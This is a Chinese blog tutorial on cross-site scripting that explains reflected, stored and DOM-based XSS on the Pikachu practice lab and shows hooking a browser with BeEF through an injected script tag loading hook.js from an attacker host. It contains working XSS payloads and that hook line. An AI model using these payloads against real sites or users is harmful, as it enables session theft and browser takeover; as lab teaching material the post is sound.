XSS漏洞及其工具Beef使用

已于 2024-03-25 15:50:22 修改
阅读量863 收藏 22
点赞数 24
文章标签: xss 前端
于 2024-03-22 16:59:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ytdd66/article/details/136910657
版权

    XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML 标签,当这些HTML标签引入了一段 JavaScript 脚本时,这些脚本程序就将会在用户浏览器中执行,造成 XSS 攻击。

XSS 漏洞产生条件主要包含以下三个方面:

  • (1)可以控制的输入点。
  • (2)对输入数据没有进行有效的过滤和校验
  • (3)输入的数据能返回到前端页面并被浏览器当成脚本语言解释执行

漏洞分类

依据攻击代码的工作方式可以将 XSS 漏洞分为三种类型:

  • (1)反射型
  • (2)存储型
  • (3)DOM型

(1)反射型

    反射型XSS,又称非持久型 XSS,之所以称为反射型 XSS,是因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等方式“反射”回来,而称为非持久型 XSS,则是因为这种攻击方式是一次性的。攻击者通过通信工具、电子邮件等方式,将包含注入脚本的恶意链接发送给受害者,当受害者点击该链接时,注入脚本被传输到目标服务器上,服务器再将注入脚本“反射”到受害者的浏览器上,浏览器则会执行脚本。

基于pakachu平台演示一个反射型

输入'"<>666,发现没有被过滤掉

输入<script>alert(1)</script>,删掉maxlength的20个字符的限制

(2)存储型

    存储型XSS(Cross-Site Scripting)是一种常见的Web安全漏洞。攻击者往Web应用程序中注入恶意代码,这些代码被存储在服务器端。当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。存储型XSS攻击通常发生在用户留言板、论坛、博客、收货地址、个人信息等需要用户输入且保存在数据库的地方,从而收到攻击。

查看过滤'"<>666

<script>alert(1)</script>

(3)DOM型

    DOM(Document Object Model)即文档对象模型,提供通过JavaScript对HTML操作的接口。DOM型漏洞是客户端JavaScript脚本处理逻辑存在的漏洞,会导致的安全问题。跟反射型和存储型不同,DOM型漏洞不经过后台交互。
下面基于pikachu平台,演示一个完整的DOM型XSS漏洞测试过程

查看源码

通过分析源码可知,JavaScript使用getElementById 函数获取标签Id为text的内容,然后赋值给str,再把st拼接其他内容后赋值给a标签的href属性,a标签被写到Id为dom的div标签中,因此,通过闭合的方式构造Payload为“#'οnclick= alert("xss")>”

   <div id="xssd_main">
                <script>
                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试:'><img src="#" onmouseover="alert('xss')">
                    //试试:' onclick="alert('xss')">,闭合掉就行
                </script>
                <!--<a href="" onclick=('xss')>-->
                <input id="text" name="text" type="text"  value="" />
                <input id="button" type="button" value="click me!" onclick="domxss()" />
                <div id="dom"></div>
            </div>

构造payload  #' οnclick= alert("xss")>点击

Beef

Beef(The Browser Exploitation Framework)是一款针对浏览器的渗透测试工具,一旦 Beef 钩住了浏览器,它将自动获取浏览器信息,同时可以进行社会工程学、网络攻击,也可以进行Tunneling 和 XSS Rays。Kali Linux 默认安装了 Beef。

下面基于 pikachu 平台中 XSS 漏洞模块和Kali Linux 演示一个 XSS 漏洞的综合利用案例。

访问beef

打开pakachu的xss(get)构造payload

<script src=http://192.168.235.128:3000/hook.js></script>

我们发现客户机已经在beef攻击平台上上线了。

选中上线主机我们就可以进行攻击了

在Command窗口,存放着一些可以执行的命令,不同颜色命令表示靶机浏览器的反应程度:

  • 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见;
  • 灰色模块:模块为在目标浏览器上测试过;
  • 橙色模块:模块可用,但结果对用户可见;
  • 红色模块:表示模块不适用当前用户,有些红色模块也可以执行,会有较大反应。

详情可以在beef官网查看使用情况:

BeEF - The Browser Exploitation Framework Project

羊腿大大
关注
  • 24
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4600
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
xss与cookie漏洞验证工具
08-25
xss与cookie漏洞验证工具
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2346
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 5843
xss-工具-Beef-Xss安装以及使用
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6384
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
XSS跨站脚本攻击
weixin_68057794的博客
08-08 827
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。从上面中的一段话,可以得知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。...
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection...
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3501
文章目录简介:用法:(一)、Options:(二)、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十二)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 9409
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
XSS攻击和跨站脚本安全漏洞防护
Zyw907155124的博客
09-05 3733
存储型XSS可以持续攻击用户,在用户提交了包含XSS代码的数据存储到数据库后,每当用户在浏览网页查询对应数据库中的数据时,那些包含XSS代码的数据就会在服务器解析并加载,当浏览器读到XSS代码后,会当做正常的HTML和JS解析并执行,于是发生存储型XSS攻击。**例如**:下面JSP代码片段的功能是根据一个已知用户雇员ID(id)从数据库中查询出该用户的地址,并显示在JSP页面上。如果address的值是由用户提供的,且存入数据库时没有进行合理的校验,那么攻击者就可以利用上面的代码进行存储型XSS攻击
XSS漏洞利用工具BeEF
最新发布
RockHan
11-06 373
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 982
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 3857
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
web安全中使用beef工具自动化xss攻击流程
qq_63539335的博客
01-30 605
web安全中使用beef工具实现自动化xss攻击
beef-xss安装与使用
Bu2n的博客
12-07 3247
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
xss漏洞检测工具推荐
06-01
推荐以下几款xss漏洞检测工具: 1. OWASP ZAP:一款功能强大的开源Web应用程序安全扫描工具,支持xss漏洞检测。 2. Acunetix:一款流行的Web应用程序安全扫描工具,提供全面的xss漏洞检测功能。 3. Burp Suite:一款专业的Web应用程序渗透测试工具,提供强大的xss漏洞检测和利用功能。 4. Nessus:一款流行的网络漏洞扫描器,可用于检测xss漏洞和其他Web应用程序安全问题。 5. Nexpose:一款全面的漏洞管理和漏洞扫描工具,可用于检测xss漏洞和其他Web应用程序安全问题。 请注意,在使用任何xss漏洞检测工具之前,请确保您已经获得了授权,并已经获得了目标网站的所有者的明确许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值